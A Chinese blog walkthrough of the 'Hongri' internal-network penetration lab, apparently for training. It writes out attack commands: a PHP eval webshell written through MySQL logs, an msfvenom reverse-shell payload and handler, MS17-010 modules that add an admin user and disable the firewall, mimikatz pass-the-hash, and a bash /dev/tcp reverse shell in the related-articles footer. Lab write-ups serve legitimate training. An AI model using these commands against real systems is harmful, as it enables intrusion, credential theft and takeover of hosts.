红日内网渗透靶场1

2023-12-23 09:00
文章标签 靶场 渗透 红日

本文主要是介绍红日内网渗透靶场1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

网络拓扑

环境配置

测试网络连通性

信息收集

漏洞利用

内网信息收集

内网攻击

横向移动


网络拓扑

 

环境配置

攻击机:kali

kali IP:192.168.123.129

WEB服务器:win7

1. 外网IP:192.168.123.153

2. 内网IP:192.168.52.143

域成员:win 2k3

IP:192.168.52.141

域控服务器:win 2008

网卡IP:192.168.52.138

测试网络连通性

win7  ping  win2k 、win2008

图-1


图-2 


信息收集

使用nmap对192.168.123.0/24网段进行扫描

nmap  -sV -sS -A 192.168.123.0/24

图-3 


发现80和3306端口开启,访问页面http://192.168.123.143/发现页面存在大量信息泄露,收集有效信息。

图-4


 发现网站底部有一个MySQL数据库连接检测:

图-5


尝试输入用户名和密码root/root,成功连接

图-6


使用御剑扫描目录发现网站备份文件和phpadmin后台管理界面

图-7 


打开备份文件发现网站源码,打开robots.txt发现网站CMSyxcms,访问进入网站首页

图-8 


漏洞利用

信息泄露+弱口令

网站泄露后台地址和用户密码,且用户密码为弱口令

图-9 


使用泄露的用户名密码成功登录网站后台界面

图-10 


yxcms留言本XSS存储型漏洞

利用存储型xss,在前台提交带有XSS代码的留言,

 图-11


后台审核成功弹出XSS弹窗

图-12 


审核通过之后,前台同样成功弹窗

图-13


yxcms后台任意文件读写漏洞

在后台创建新模板模块创建内容为一句话木马的新模板

图-14


图-15


通过前面的备份文件知道文件保存的目录

http://192.168.123.153/yxcms/protected/apps/default/view/default/

图-16


使用蚁剑成功连接shell

图-17


访问phpmyadmin,尝试使用弱口令root/root,可以登入

图-18


利用日志文件写入木马

1.开启日志功能

set global slow_query_log=’on’;

2.设置日志存储路径

set global general_log_file='C:/phpStudy/WWW/shell.php';

3.执行sql语句,写入一句话木马

select "<?php eval($_POST[cmd]);?>"

成功getshell

图-19


图-20


使用msf反弹shell

生成Windows后门程序反弹shell:

Msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.129 lport=6666 -f exe -o shell.exe

图-21


启动监听:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.123.129

set lport 6666

show options

run

图-22


将生成的shell.exe利用蚁剑上传至win7并运行

成功反弹shell

图-23


上线cs

图-24


先创建监听器

图-25


生成后门

图-26


通过蚁剑把exe上传执行,成功上线

图-27


mimikatz工具抓取本机用户名密码:

图-28


图-29


msf上线cs

先记录要返回session的id,msf载入use exploit/windows/local/payload_inject模块,设置payload一定要与cs监听器保持一致:

图-30


lport写的是cs监听端口

lhost写的是cs主机ip

图-31


设置一个监听当msf发起攻击的时候,cs就会上线

图-32


成功上线:

图-33


添加路由到目标环境网络,使得msf能够通过win7路由转发访问192.168.25.0/24网段

run get_local_subnets   #查看路由信息

run autoroute -s 192.168.52.0/24  #添加一条路由

图-34


设置代理可以访问内网:

使用msf的socks代理模块

use auxiliary/server/socks

use auxiliary/server/socks_proxy

图-35


文本编辑 vim /etc/proxychains.conf,在最后一行加上socks5代理服务器

Socks5 192.168.123.129 1080

图-36


内网信息收集

使用msf查看补丁信息:run post/windows/gather/enum_patches

图-37


安装软件信息:run post/windows/gather/enum_applications

图-38


查看路由信息:run get_local_subnets

图-39


arp扫描52网段:run post/windows/gather/arp_scanner rhosts=192.168.52.0/24

图-40


关闭防火墙,开启3389进行远程连接

NetSh Advfirewall set allprofiles state off //关闭防火墙

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 //开启3389

使用获得的账户密码登录

图-41


发现当前主机安装了Nmap

直接利用这台主机上的工具来进行内网主机的端口扫描

图-42


进行端口扫描nmap -Pn -sT -p 1-1000 192.168.52.138

图-43


nmap -Pn -sT -p 1-1000 192.168.52.141

图-44


继续使用 nmap 进行主机漏洞扫描,查看是否存漏洞

nmap --script=vuln 192.168.52.128   存在ms17-010 漏洞

图-45


nmap --script=vuln 192.168.52.141  

存在ms08-067、ms17-010 漏洞

图-46


内网攻击

漏洞测试是否存在ms17-010:

search ms17-010 //查找ms17-010模块

use auxiliary/scanner/smb/smb_ms17_010 //使用此模块

set rhosts 192.168.52.138 192.168.52.141 //将rhosts参数设置为138 141两个IP

run //运行

图-47


use auxiliary/admin/smb/ms17_010_command //使用该模块

show options //查看配置

set command net user test @qwer1234 /add  //添加用户

set rhosts 192.168.52.138 //添加目标IP

run //运行

图-48


set command net localgroup administrators  test /add //将test添加到管理组

run //运行

图-49


set command net localgroup administrators //查看管理组成员

run //运行

图-50


set command NetSh Advfirewall set allprofiles state off //关闭防火墙

run //运行

图-51


use exploit/windows/smb/ms17_010_psexec //使用该模块

show options //查看配置

set rhosts 192.168.52.138 //设置目标IP

set payload windows/meterpreter/bind_tcp //选择正向连接

run //运行

图-52


成功拿到域控shell

横向移动

通过pwdump7得到Hash值

图-53


在Win7运行mimikatz哈希传递攻击脚本

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:GOD /ntlm:2E8B24E00BD703E52CFE327A072006B0

图-53


图-54

这篇关于红日内网渗透靶场1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/527469

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

【工具分享】针对加解密综合利用后渗透工具 - DecryptTools

下载地址: 链接: https://pan.quark.cn/s/2e451bd65d79 工具介绍 支持22种OA、CMS 加解密+密码查询功能 万户OA用友NC金蝶EAS蓝凌OA致远OA宏景ERP湖南强智金和jc6 瑞友天翼金和C6 Navicat华天动力 FinalShell亿赛通帆软报表H3C CASWeblogic金蝶云星空新华三IMC金盘 OP

内网渗透—横向移动非约束委派约束委派

前言 今天依旧是横向移动的内容,委派主要分为三类非约束委派、约束委派、资源委派。今天主要讲前面两个内容,资源委派留到最后再讲。 实验环境 Web:192.168.145.137,192.168.22.28DC:192.168.22.30 非约束委派 原理 原理很简单,当DC访问具有非约束委派权限的主机A时,会把当前域管理员账户的TGT放在ST票据中,然后一起发给主机A。主机A会把TG

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

【渗透测试专栏】1.2认证和授权类-越权访问(水平/垂直越权)

该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 靶机环境请看专栏前言专栏前言-WooYun漏洞库环境搭建-CSDN博客 目录 该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 一、漏洞描述 1、水平越权 2、垂直越权 二、漏洞级别 三、漏洞检测方法 漏洞修复 一、漏洞描述 偏业务漏洞 1、水平越权 水平越权指的是在同一权限级别下,用户可以访问其他用户的资源或

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

渗透中的文件上传与下载

有时候拿下一台机器的控制权,需要在这台主机上传一些东西;有时候也会碰到不能直接上传只能通过命令行执行的shell,这就需要将shell下载下来。 目录 利用powershell进行文件上传下载 利用bitsadmin命令进行文件下载 利用certutil命令上传下载文件 利用wget命令上传下载文件 利用powershell进行文件上传下载 # 下载脚本并在内存中执行pow

【网络安全 | 渗透工具】Cencys+Shodan使用教程

原创文章,不得转载。 文章目录 Cencys准备语法全文搜索字段和值搜索通配符搜索布尔逻辑搜索嵌套搜索时间相关搜索范围搜索双引号 (")转义序列和保留字符 Censys 搜索语言中的主机查询查看主机搜索结果Censys 搜索语言中的证书查询查看证书搜索结果生成报告其余 Shodan准备使用语法查看设备详情 Cencys Censys 是一个强大的互联网搜索引擎和数据平台